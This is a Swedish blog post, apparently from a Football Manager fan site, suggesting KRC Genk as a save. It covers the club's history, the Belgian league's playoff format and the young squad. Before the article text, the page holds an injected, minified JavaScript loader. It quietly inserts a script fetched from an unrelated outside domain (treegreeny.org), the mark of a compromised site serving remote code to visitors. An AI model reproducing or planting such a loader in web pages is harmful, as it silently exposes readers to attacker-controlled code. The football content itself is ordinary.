;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: KRC Genk – FMSweden
Meny Stäng

Veckans inspiration: KRC Genk

Det blåvita laget Koninklijk Racing Club Genk från den belgiska staden står i centrum denna söndag. Klubben bildades genom en sammanslagning 1988 och har sedan slutet på förra millenniet varit en av landets mest framgångsrika, främst i konkurrens med Anderlecht och Standard Liege. På senare år har de vunnit både cupen och ligan och dessutom deltagit i CL-gruppspel. Luminus Arena har en fin kapacitet på drygt 24 000 åskådare, men det är främst faciliteterna som sticker ut för Genks del. De håller onekligen toppklass. Många fina belgiska spelare har tillhört akademin, där Kevin de Bruyne får anses vara det största namnet hittills. Således är det rimligt att styrelsen vill att du utvecklar egna spelare, samt att du värvar in spelare yngre än 21 år och absolut inte över 30.

Första säsongen tippas Genk komma på en femteplats, där Club Brugge gäller som favoriter. Upplägget för den belgiska högstaligan – Jupiler Pro League liknar mest Hockeyallsvenskan. Är ni redo? Häng med och håll i er nu. Vi börjar ganska enkelt. Alla 18 lag möter varandra hemma och borta, vilket resulterar i 34 matcher. Jumbon flyttas ned direkt till andraligan och nästjumbon får möta tvåan i andraligan i ett dubbelmöte om en plats i högstaserien. Så långt allt väl. De fyra högst placerade lagen gör upp om titeln i en mästerskapsserie, där de får ta med sig hälften av poängen från grundserien. Sedan möter de varandra hemma och borta igen. Enligt nuvarande koefficienter går ettan till CL-gruppspel, tvåan till CL-kval och trean till EL-playoff. Fyran får däremot spela ännu ett dubbelmöte. Parallellt med mästerskapsserien möts nämligen lag 5-8 varandra i en annan kvalserie, även där kvarstår hälften av poängen. Vinnaren i den kvalserien möter sedan fyran från mästerskapsserien, där vinnaren till sist får kvala till Europa Conference League. Glasklart va?

För er som minns Arne Hegerfors klassiska DVD:er “Självmål och fotbollstabbar” och såg extramaterialet där så är ju Genk ett givet lagval.  Matchen mot Westerlo säsongen 1999/2000 slutade nämligen 6-6 (!) och innehöll mängder av röda kort och straffar till höger och vänster. Se klipp HÄR. Westerlo befinner sig för närvarande i andraligan, så ni som är sugna på en mer långsiktig save har ett alternativ där. Nåja. Truppen då? Svenske anfallaren Benjamin Nygren är för närvarande utlånad, men viss svenskkoppling finns ändå i form av Jere Uronen som gjorde fyra säsonger i Helsingborgs IF i början av 2010-talet. I mål finns stortalangen Vandevoordt och backlinjen kryllar av unga, utvecklingsbara spelare och detsamma gäller mittfältet. Det är väl bara anfallssidan som är något äldre i sammanhanget, med tre stycken runt 26 år fyllda. Överlag en ganska låg medelålder, där målvakten Vukovic är den enda över 28 år. Här finns således goda möjligheter för en så kallad “youth challenge” där du endast använder spelare från den egna akademin. Eventuellt kan man även tillåtas köpa in unga, belgiska spelare – eller så kör man helt fritt, det är förstås upp till var och en. Oavsett vad – lycka till med saven!

K.C.R. Genk club crest

Please wait...

Liknande Inlägg

Lämna ett svar